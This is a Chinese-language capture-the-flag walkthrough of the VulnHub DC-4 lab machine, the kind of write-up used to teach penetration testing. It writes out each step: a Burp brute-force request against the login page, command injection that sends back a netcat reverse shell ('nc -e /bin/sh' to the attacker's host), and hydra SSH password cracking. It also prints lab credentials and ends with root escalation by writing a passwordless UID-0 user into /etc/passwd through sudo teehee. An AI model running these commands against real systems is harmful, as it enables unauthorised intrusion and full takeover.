VulnHub通关日记-DC_4-Walkthrough
VulnHub通关日记-DC_4-Walkthrough
VulnHub通关DC_4-Walkthrough
靶机介绍
DC-4是另一个专门构建的易受攻击的实验室,目的是在渗透测试领域积累经验。
与以前的DC版本不同,此版本主要为初学者/中级用户设计。只有一个标志,但是从技术上讲,有多个入口点,就像上次一样,没有任何线索
靶机地址:https://www.vulnhub.com/entry/dc-4,313/
这边靶机和前一个是一样的,只需要获取一个Flag就行了,在/root目录下!
学习到的知识
Burpsuite枚举弱密码命令执行反弹shellhydra爆破ssh teehee权限提升
信息搜集
拿到IP先对它进行端口扫描:
nmap -A -T4 192.168.1.100
图片
这边扫描出来靶机开放了22(ssh),80(http)端口,先从80端口来入侵:
http://192.168.1.100/
图片
Burpsuite枚举弱密码
:后发现是一个登陆的页面,我尝试了常规的弱口令admin,admin123无果,随后我又尝试了一遍SQL注入,并没有注入点!这个时候就需要掏出我的字典来了来配合Burp爆破:
POST /login.php HTTP/1.1
Host: 192.168.1.100
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.100/
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
Connection: close
Cookie: PHPSESSID=lddqa4ven9a9qqf8ua9tlurj35
Upgrade-Insecure-Requests: 1
username=admin&password=§123456§
burp枚举弱密码1
burp枚举弱密码2
爆破成功后得到密码happy,随后携带账号和密码登陆到了后台,在后台发现可以执行查看文件的操作:
执行查看文件操作
命令执行反弹shell
这个时候想到了命令执行,whoami看了看权限是一个网站普通权限:
whoami回显
我们先用nc反弹一个shell回来把,kali监听4444端口,在radio变量输入nc反弹的地址成功反弹一枚shell:
nc -e /bin/sh 192.168.1.128 4444
反弹壳
我们先让它得到一个bash把:
python -c 'import pty;pty.spawn("/bin/bash")'hydra爆破ssh
之后我是在/home/jim目录里发现了一个历史密码的备份文件:
历史密码备份文件
既然得到了密码,就那么用九头蛇来爆破把:
hydra -l jim -P pass ssh://192.168.1.100 -t 10
九头蛇爆破
爆破成功后得到jim的密码为jibril04,后来我登陆到了jim用户:
ssh jim@192.168.1.100
ssh链接
登陆之后我习惯性的sudo -l发现需要密码:
须藤-l回显
紧接着我在jim的目录下发现了一个文件,文件里好像是一封邮件信息:
From root@dc-4 Sat Apr 06 20:20:04 2019
Return-path: <root@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 20:20:04 +1000
Received: from root by dc-4 with local (Exim 4.89)
(envelope-from <root@dc-4>)
id 1hCiQe-0000gc-EC
for jim@dc-4; Sat, 06 Apr 2019 20:20:04 +1000
To: jim@dc-4
Subject: Test
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCiQe-0000gc-EC@dc-4>
From: root <root@dc-4>
Date: Sat, 06 Apr 2019 20:20:04 +1000
Status: RO
This is a test.
邮件信息
好像没得啥子用处!最后我在邮箱目录找到了另一封邮件:
另一篇邮件信息
读完这封邮件我得到了charles告诉jim的一个重要信息,也就是charles的密码!
charles:^xHhA&hvim0y获取到密码后我切换到了charles用户:
su charles
^xHhA&hvim0y
切换charles用户
teehee权限提升
切换用户之后我又是习惯性的sudo -l发现charles用户可以以root身份去运行teehee命令:
用root身份身份运性teehee命令
我紧接着写入了一个账号saul到passwd里:
echo "saul::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
#注释:
#[用户名]:[密码]:[UID]:[GID]:[身份描述]:[主目录]:[登录shell]
写入passwd拿到标志
最后也是在/root目录下拿到了Flag〜